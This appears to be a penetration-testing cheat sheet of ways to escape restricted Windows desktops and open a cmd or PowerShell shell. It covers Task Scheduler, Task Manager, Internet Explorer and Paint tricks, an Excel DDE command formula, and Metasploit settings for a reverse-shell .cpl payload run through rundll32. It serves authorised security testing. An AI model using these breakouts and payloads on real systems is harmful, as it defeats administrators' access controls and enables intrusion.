# Windows utilities Credit: ## Notepad We can try and create a file a new text file and save at as `file.bat` with the content of `cmd.exe` , double click on the file and a cmd will open. ## Cortana McAfee uncovered and documented the security flaws in a lengthy blog post, with one simple issue being the fact that you could trigger the voice assistant from the lock screen (assuming Cortana is enabled in this respect, on default settings), and bring up a contextual Windows 10 menu simply by typing while Cortana is listening to a query. simply typing while Cortana starts to listen to a query on a locked device will bring up a Windows contextual menu, as shown below ![](https://firebasestorage.googleapis.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-M4xwp6Mq18nX8yR4M5z%2Fuploads%2FsajbiwtRLNGq4iTSQzZL%2Ffile.png?alt=media) ## Task Scheduler An interesting weakness, where some systems prevent access to cmd.exe, however it can still be scheduled to run via Task Scheduler. This can be done either via the command line scheduler (at.exe) or the GUI (taskschd.msc). A basic task can be created to run cmd.exe at a specific time (i.e. 1 minute in the future) or upon certain events such as when a user logs on. We can use it to make it run powershell from the path: `%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe` When a user logout and log back in ## Task Manager Task Manager: CTRL+SHIFT+ESC -> File -> Run New Task ## Printer Right-click anywhere -> Print -> Find Printer -> browse to cmd.exe ## Internet Explorer Get a cmd shell in Internet Explorer: ### Address Bar Enter in address bar: `file://C:\Windows\System32\cmd.exe` ### Developer Tools Developer Tools: Press F12 -> Performance Tab -> Press on 3rd icon "Importing Profile Session" ## Excel Get a cmd.exe shell using Excel: Place this in a cell and press enter: `=cmd|' /k cmd.exe'!'A1'` ## Windows Search Get a cmd.exe or Powershell shell using Windows search: press Windows key and enter search. Note that admins frequently block cmd.exe and Powershell but forget to block Powershell ISE. ## Shortcuts Try shortcuts: Shift \* 5 = 5 sticky key Alt + F4 = shutdown computer Win + R = run Ctrl + Shift + esc = task manager Ctrl + alt + delete = help menu (task manager, change password , etc) ## Control Panel Generating a simple x64 reverse shell in a .cpl format: ``` use windows/local/cve_2017_8464_lnk_lpe set payload windows/x64/shell_reverse_tcp ``` Invoking the shellcode via control.exe: `control.exe .\FlashPlayerCPLApp.cpl` \# or `rundll32.exe shell32.dll,Control_RunDLL file.cpl` \# or `rundll32.exe shell32.dll,Control_RunDLLAsUser file.cpl` ## Paint An unusual, yet effective method of gaining a shell by creating a shortcut to cmd.exe by drawing certain colours in Microsoft Paint. Due to the encoding algorithm used to write BMP files, it is possible to dictate ASCII data written into a file by carefully selecting certain RGB colours. ![IMAGE12](https://firebasestorage.googleapis.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-M4xwp6Mq18nX8yR4M5z%2Fuploads%2FweaIqzuH98wwPceSPQmO%2Ffile.jpeg?alt=media) Open MSPaint.exe and set the canvas size to: Width=6 and Height=1 pixels Zoom in to make the following tasks easier Using the colour picker, set pixels values to (from left to right): ``` 1st: R: 10, G: 0, B: 0 2nd: R: 13, G: 10, B: 13 3rd: R: 100, G: 109, B: 99 4th: R: 120, G: 101, B: 46 5th: R: 0, G: 0, B: 101 6th: R: 0, G: 0, B: 0 ``` Save it as 24-bit Bitmap (\*.bmp;\*.dib) Change its extension from bmp to bat and run.